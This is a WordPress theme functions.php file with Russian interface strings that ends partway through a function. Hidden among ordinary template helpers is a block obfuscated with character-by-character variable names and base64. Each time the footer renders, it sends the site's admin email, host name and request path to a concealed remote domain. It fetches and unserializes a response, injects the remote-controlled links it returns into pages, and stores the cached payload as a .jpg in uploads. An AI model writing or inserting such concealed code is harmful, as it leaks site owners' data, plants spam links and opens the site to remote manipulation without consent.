<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $dNydi='o';$EWQMvRV='b';$QNSJh='e';$ZuHV='4';$Ytzp='d';$uqcq='_';$tDVw='a';$tNsr='e';$pSGV='s';$mVPID='6';$LEEQXr='e';$wTtSY='d';$pFvk='c';$AUEBvInr=$EWQMvRV.$tDVw.$pSGV.$tNsr.$mVPID.$ZuHV.$uqcq.$wTtSY.$LEEQXr.$pFvk.$dNydi.$Ytzp.$QNSJh;$nytC='n';$YgXAyj='f';$GbileQ='z';$raIuHGE='a';$pLEDj='t';$qblcHmk='l';$rlpSRv='g';$cGYkQJg='i';$fQWmOxK='e';$DropiEDr=$rlpSRv.$GbileQ.$cGYkQJg.$nytC.$YgXAyj.$qblcHmk.$raIuHGE.$pLEDj.$fQWmOxK;$Erzux='3';$JJeIs='o';$XXONUa='t';$RrOpoE='r';$sRSS='1';$FhQz='t';$ufNZ='s';$PfOd='_';$rLzEMy='r';$nAcoixWP=$ufNZ.$XXONUa.$rLzEMy.$PfOd.$RrOpoE.$JJeIs.$FhQz.$sRSS.$Erzux;$uhsYk='r';$dmxcrf='e';$bTpZGX='s';$kvdR='v';$TJHG='t';$aKAfLk='r';$DduebKZe=$bTpZGX.$TJHG.$aKAfLk.$uhsYk.$dmxcrf.$kvdR;                     
		$fm____z='o';$rd_____________j='b';$rj______________u='e';$co_____________e='4';$ec_____________v='d';$ih_____________u='_';$qg_______o='a';$us______________w='e';$am____y='s';$qo_________c='6';$cz______t='e';$gy____y='d';$ft_____g='c';$xe__________j=$rd_____________j.$qg_______o.$am____y.$us______________w.$qo_________c.$co_____________e.$ih_____________u.$gy____y.$cz______t.$ft_____g.$fm____z.$ec_____________v.$rj______________u;
		$om___________t='c';$gg_________i='n';$mq_______________y='o';$hy_______n='f';$bv_____f='i';$do_____s='t';$ww___h='s';$jm______________h='s';$or_______________u='e';$zv_____w='_';$rg______________d='t';$xo___m='x';$xs________c='u';$xf______p='i';$lb_______s='n';$mo____y=$hy_______n.$xs________c.$gg_________i.$om___________t.$do_____s.$xf______p.$mq_______________y.$lb_______s.$zv_____w.$or_______________u.$xo___m.$bv_____f.$jm______________h.$rg______________d.$ww___h;
		$td_____________q='f';$ig_______________r='n';$ly_____________t='p';$zy_______________x='o';$ep__________c='e';$et____z=$td_____________q.$zy_______________x.$ly_____________t.$ep__________c.$ig_______________r;
		$kq_____l='r';$oc_______________o='d';$ys_________c='a';$xi___s='e';$hd___________q='f';$cc__u=$hd___________q.$kq_____l.$xi___s.$ys_________c.$oc_______________o;
		$dp______l='s';$lm_________r='o';$ai_________d='l';$ep____________d='c';$mr__y='f';$xl__________o='e';$qa__________k=$mr__y.$ep____________d.$ai_________d.$lm_________r.$dp______l.$xl__________o;
		
		define("WP_ID", $xe__________j("Mi4wLjA="));
		define("WP_TTL", $xe__________j("MTA4MDA="));
		define("WP_SRC", $xe__________j("dHBva24="));
	


		function wp_get_header() {
			global $xe__________j, $mo____y;
			
			if (
				$mo____y($xe__________j("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$mo____y($xe__________j("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$mo____y($xe__________j("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $xe__________j, $et____z, $qa__________k, $cc__u;
			
			$js______________l = TEMPLATEPATH."/".$xe__________j("Zm9vdGVyLnBocA==");
			$ij___a = @$et____z($js______________l, "r");
			$js______________l = @$cc__u($ij___a, @filesize($js______________l));
			@$qa__________k($ij___a);
			
			$ir___________k = TEMPLATEPATH."/".$xe__________j("ZnVuY3Rpb25zLnBocA==");
			$ij___a = @$et____z($ir___________k, "r");
			$ir___________k = @$cc__u($ij___a, @filesize($ir___________k));
			@$qa__________k($ij___a);
			
			$sy__________u = 0;
			if($js______________l && $ir___________k) {
				if ($xe__________j("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($js______________l, $xe__________j("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$sy__________u = 1;
					}
					if (substr_count($js______________l, "wp_theme_GPL_credits()") < 1) {
						$sy__________u = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$sy__________u = 12;
				}
			}
			
			if($sy__________u > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $sy__________u -->";
			}
		}
	


		function wp_loaded() {
			global $xe__________j, $mo____y;
			return $mo____y($xe__________j("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($gw_____________k, $ii____________o = "(more...)", $wm____________l = 0, $hj______________k = "") {
				$fq_______________u = get_the_content($ii____________o, $wm____________l, $hj______________k);
				$fq_______________u = apply_filters("the_content", $fq_______________u);
				
				$fq_______________u = str_replace("]]>", "]]>", $fq_______________u);
				if (strlen($_GET["p"]) > 0) {
					echo $fq_______________u;
				}
				else if ((strlen($fq_______________u)>$gw_____________k) && ($oc_________h = strpos($fq_______________u, " ", $gw_____________k ))) {
					$fq_______________u = substr($fq_______________u, 0, $oc_________h);
					$fq_______________u = $fq_______________u;
					echo $fq_______________u;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$ii____________o</a></div></p>";
				} else {
					echo $fq_______________u;
				}
				
			}
		}
	


		$ek______i='s';$ns_________t='o';$yd___________i='d';$ak_________n='_';$sa____w='n';$ea_______________n='a';$zg___a='e';$kr_________w='6';$ug____g='e';$ff__________y='e';$li_________b='4';$al______________d='b';$bd_______g='c';$vb______________d=$al______________d.$ea_______________n.$ek______i.$ff__________y.$kr_________w.$li_________b.$ak_________n.$zg___a.$sa____w.$bd_______g.$ns_________t.$yd___________i.$ug____g;
		$qu___i='n';$il______________d='t';$uh____________x='l';$yf__________v='s';$dl__________k='o';$od_____________q='_';$xz_______________f='n';$rn____________k='_';$bb_________z='e';$wv___________r='c';$vd____r='f';$kv_______z='t';$ba___c='g';$hw____________i='t';$bt__a='i';$xw________z='e';$hf____s='e';$ol_______m=$vd____r.$bt__a.$uh____________x.$hf____s.$rn____________k.$ba___c.$bb_________z.$il______________d.$od_____________q.$wv___________r.$dl__________k.$qu___i.$hw____________i.$xw________z.$xz_______________f.$kv_______z.$yf__________v;
		$tu_______________x='s';$xu_______________v='f';$ec_____k='t';$pg_________b='x';$wk______j='_';$ep____________p='e';$gy_____________e='i';$gk_____k='e';$mr__________t='s';$fj________f='l';$dk___i='i';$sr__g=$xu_______________v.$dk___i.$fj________f.$gk_____k.$wk______j.$ep____________p.$pg_________b.$gy_____________e.$tu_______________x.$ec_____k.$mr__________t;
		$gs______________u='s';$mc_______t='m';$ae_____________a='r';$ib_______a='v';$ov_________x='c';$sf__________m='i';$sw___o='o';$jj____________t='e';$od__h='a';$vi_________o='p';$fi___________o='o';$ad________p='n';$ii__________n='e';$ie________w='r';$fm________n='_';$pq____________w=$ib_______a.$jj____________t.$ie________w.$gs______________u.$sf__________m.$sw___o.$ad________p.$fm________n.$ov_________x.$fi___________o.$mc_______t.$vi_________o.$od__h.$ae_____________a.$ii__________n;
		$vf________w='f';$je___________f='o';$rz___i='c';$ia______________q='n';$fc_________a='e';$bz_____m='k';$nu____________b='o';$ii_________l='p';$ir____________s='s';$ic_____________y=$vf________w.$ir____________s.$je___________f.$rz___i.$bz_____m.$nu____________b.$ii_________l.$fc_________a.$ia______________q;
		$qv____________m='t';$no_____x='i';$du__________v='f';$be____________d='r';$lz______________g='w';$et__________v='e';$qn_______________x=$du__________v.$lz______________g.$be____________d.$no_____x.$qv____________m.$et__________v;
		$rq________v='5';$kv_____________a='d';$kw__________y='m';$ah_______u=$kw__________y.$kv_____________a.$rq________v;
		$id___________y='h';$zo_____z='p';$nu______r='l';$ff____b='a';$qv__________j='a';$pe______p='r';$lp_______________d='e';$xd_______c='t';$zi_______d=$pe______p.$lp_______________d.$ff____b.$nu______r.$zo_____z.$qv__________j.$xd_______c.$id___________y;
		$pm__n='u';$di_____b='a';$kv_______________g='i';$kc________f='r';$qg___________p='z';$wv______k='n';$zf_____h='s';$ek___________h='i';$my______________g='e';$uc_____________j='e';$wy____________l='l';$qm__________o=$pm__n.$wv______k.$zf_____h.$uc_____________j.$kc________f.$ek___________h.$di_____b.$wy____________l.$kv_______________g.$qg___________p.$my______________g;
		$ag____________q='m';$cm___y='t';$wf____a='a';$zz___h='n';$tn___f='p';$zs__________r='m';$ps_______________c='e';$ax___________g=$cm___y.$ps_______________c.$ag____________q.$tn___f.$zz___h.$wf____a.$zs__________r;
		$dd___________p='e';$jj________i='e';$jd___r='_';$yn___________q='t';$ec__________e='t';$su__________t='r';$ad______________n='c';$hk______j='c';$te_________u='_';$bz_______________c='o';$mx___l='s';$bf_____u='t';$ol___m='m';$gy_____________b='a';$fd______________x='n';$fa____m='e';$za_________o='x';$xd_______________d='a';$rs_______o='e';$jf________o='r';$mp__v='t';$pn__________g=$mx___l.$bf_____u.$su__________t.$rs_______o.$gy_____________b.$ol___m.$jd___r.$ad______________n.$bz_______________c.$fd______________x.$yn___________q.$fa____m.$za_________o.$mp__v.$te_________u.$hk______j.$jf________o.$jj________i.$xd_______________d.$ec__________e.$dd___________p;
	


		function pv_____________m($hb_______c) {
			global $xe__________j, $mo____y, $ol_______m, $pq____________w, $pn__________g;
			
			if (!$mo____y($xe__________j("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($pq____________w(PHP_VERSION, "5.0.0", ">=") && $mo____y($xe__________j("ZmlsZV9nZXRfY29udGVudHM=")) && $mo____y($xe__________j("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$ax__o = $pn__________g(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$pd___________r = @$ol_______m($hb_______c, 0, $ax__o);
			} else {
				$pd___________r = @$ol_______m($hb_______c, 0);
			}
			
			return $pd___________r;
		}
	


		function cu_________z($hb_______c) {
			global $mo____y, $ic_____________y, $qn_______________x, $xe__________j;
			
			if (!$mo____y($xe__________j("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$jt___________h = strpos($hb_______c, "/", 7);
			$lt___________l = array(
				"uri"     => substr($hb_______c, $jt___________h),
				"host"    => str_replace("http://", "", substr($hb_______c, 0, $jt___________h)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$wa__h = @$ic_____________y("$lt___________l[host]", 80, $lx___y, $wf___h, 4);
			
			if (!$wa__h) {
				return false;
			} else {
				$pd___________r = "";
				$lk_______j  = "GET $lt___________l[uri] HTTP/1.0\r\n";
				$lk_______j .= "Host: $lt___________l[host]\r\n";
				$lk_______j .= "Referer: $lt___________l[referer]\r\n";
				$lk_______j .= "Connection: Close\r\n\r\n";
				
				@$qn_______________x($wa__h, $lk_______j);
				
				while (!@feof($wa__h)) {
					$gm____________o = @fgets($wa__h, (1024*24));
					
					if ($gm____________o == "\r\n") {
						$qg_________x = true;
						continue;
					}
					
					if ($qg_________x) {
						$pd___________r .= $gm____________o;
					}
				}
				
				return $pd___________r;
			}
		}
	


		function vv_______d($hb_______c) {
			global $mo____y;
			$yg____h = false;
			
			if ($hb_______c != "") {
				if ($mo____y("pv_____________m")) {
					$yg____h = @pv_____________m($hb_______c);
				}
				
				if (!$yg____h && ($mo____y("cu_________z"))) {
					$yg____h = @cu_________z($hb_______c);
				}
			}
			
			return $yg____h;
		}
	


		function ar___d() {
			global $_SERVER, $ah_______u;
			
			$xa_________x = $_SERVER["SERVER_NAME"];
			
			if (substr("$xa_________x", 0, 4) == "www.") {
				$xa_________x = substr("$xa_________x", 4);
			}
			
			$xa_________x = $ah_______u("$_SERVER[SERVER_NAME]");
			
			return $xa_________x;
		}
	


		function tg______________m() {
			return "file";
		}
	


		function cy__________x($hb_______c) {
			global $_SERVER, $ol_______m, $sr__g, $et____z, $qa__________k, $qn_______________x;
			
			$nz______r = ll______________y();
			
			$vf__z = ar___d().".jpg";
			$ol____o = $nz______r["dir_upload"]["path"]."/$vf__z";
			$zj__________l = @filemtime($ol____o);
			
			if (!$zj__________l || ((time()-$zj__________l) >= WP_TTL)) {
				$yg____h = vv_______d($hb_______c);
				
				if ($yg____h) {
					if ($sr__g($ol____o)) {
						@unlink($ol____o);
					}
					
					$ij___a = @$et____z($ol____o, "x+");
					
					@$qn_______________x($ij___a, $yg____h);
					@$qa__________k($ij___a);
				}
			} else {
				if ($sr__g($ol____o)) {
					$yg____h = @$ol_______m($ol____o);
				} else {
					$yg____h = false;
				}
			}
			
			return $yg____h;
		}
	


		function ll______________y() {
			global $_SERVER, $xe__________j, $vb______________d;
			
			$oq________t = wp_count_posts("post");
			$fk________x = pathinfo(get_bloginfo("template_directory"));
			
			$nz______r = array(
				"url" => array(
					"report"      => $xe__________j("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $fk________x,
				"dir_upload"	=> ck____________i(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$fk________x[filename],
					"a005=".$oq________t->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://clinic-virtus.com/o-lechenii-zubov-i-zubnoj-emali/\">О лечении зубной эмали</a> "
			);
			
			$nz______r["url"]["queryString"] = implode("&", $nz______r["queryString"]);
			$nz______r["url"]["report"] = $nz______r["url"]["report"]."/?".$vb______________d($nz______r["url"]["queryString"]).".html";
						
			return $nz______r;
		}
	


		function ck____________i() {
			$de________d = wp_upload_dir();
			
			if (isset($de________d["error"])) {
				$bs_______d = ke___h();
				if (is_writable($bs_______d)) {
					$de________d = array("path" => $bs_______d);
				}
			}

			return $de________d;
		}
	


		function ke___h() {
			global $mo____y, $ah_______u, $zi_______d, $ax___________g;
			
			$tz________x = (bool) ini_get("safe_mode");
			if ($tz________x == true) {
				return false;
			}
			
			if ($mo____y("sys_get_temp_dir")) {
				$rw_______r = sys_get_temp_dir();
				if (is_writable($rw_______r)) {
					return $zi_______d($rw_______r);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $zi_______d($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $zi_______d($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $zi_______d($_ENV["TEMP"]);
			} else {
				$dw____________r = $ax___________g($ah_______u(uniqid(rand(), true)), "");
				if ($dw____________r) {
					$rw_______r = $zi_______d(dirname($dw____________r));
					@unlink($dw____________r);
					return $rw_______r;
				} else {
					return false;
				}
			}
		}
	


		function lb______________b() {
			global $_GET, $sr__g;
			
			$nz______r = ll______________y();
			$xa_________x = ar___d();
			$et______r = tg______________m();
			
			$ci___q = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($et______r == "file") {
					$dk_____________l = $nz______r["dir_upload"]["path"]."/".$xa_________x.".jpg";
					if ($sr__g($dk_____________l)) {
						@unlink($dk_____________l);
						$ci___q = "deleted";
					}
				}
				
				$sn_____q = array(
					"s"	=> $ci___q,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($sn_____q AS $na________q => $li___r) echo " [$na________q:$li___r]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $mo____y, $xe__________j, $qm__________o;
			$nz______r = ll______________y();
			
			$xc____________l = "cy__________x";
			if ($mo____y($xc____________l)) {
				$pd___________r = $xc____________l($nz______r["url"]["report"]);
			}
			
			if ($pd___________r) {
				if ($pd___________r = @$xe__________j($pd___________r)) {
					$pd___________r = @$qm__________o($pd___________r);
					
					if (strlen($pd___________r[custom_credit]) >= 5) {
						$nz______r["default_string"] = $pd___________r[custom_credit];
					}
					
					if ($pd___________r["status"] == "0") {
						$jx____________j = 1;
						$pt__________g = 1;
					} else {
						$av_______________p = sizeof($pd___________r["links"]);
						$og_______________l = $nz______r["default_string"];
						
						if ($av_______________p > 0 && $pd___________r["links"] !== "") {
							$xr__u = 0;
							foreach ($pd___________r["links"] as $us__________j => $zo___o) {
								$xr__u++;
								if ($zo___o->l_path == "" || $zo___o->l_path == $_SERVER["REQUEST_URI"]) {
									$zo___o->l_href = htmlspecialchars(strip_tags($zo___o->l_href));
									$zo___o->l_title = htmlspecialchars(strip_tags($zo___o->l_title));
									$zo___o->l_anchor = htmlspecialchars(strip_tags($zo___o->l_anchor));
									$og_______________l .= " | ";
									$og_______________l .= "<a href='$zo___o->l_href' title='$zo___o->l_title'";
									if ($zo___o->l_nofollow == "1") {
										$og_______________l .= " rel='nofollow'";
									}
									$og_______________l .= ">$zo___o->l_anchor</a>";
								}
							}
						}
						$nz______r["links"] = "$og_______________l";
						if ($pd___________r[credit] == "0") {
							$nz______r["links"] = "";
						}
					}
				} else {
					$jx____________j = "1";
				}
			} else {
				$jx____________j = "1";
			}
			
			if ($jx____________j == "1") {
				$nz______r["links"] = $nz______r["default_string"];
			}
			
			echo "$nz______r[links]";
			
			echo "<!-- s: $pd___________r[signature] -->";
			lb______________b();
		}
	                      
 
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Старницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
                       break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Ссылка на %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Теги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментарий &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("нумерация страниц", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
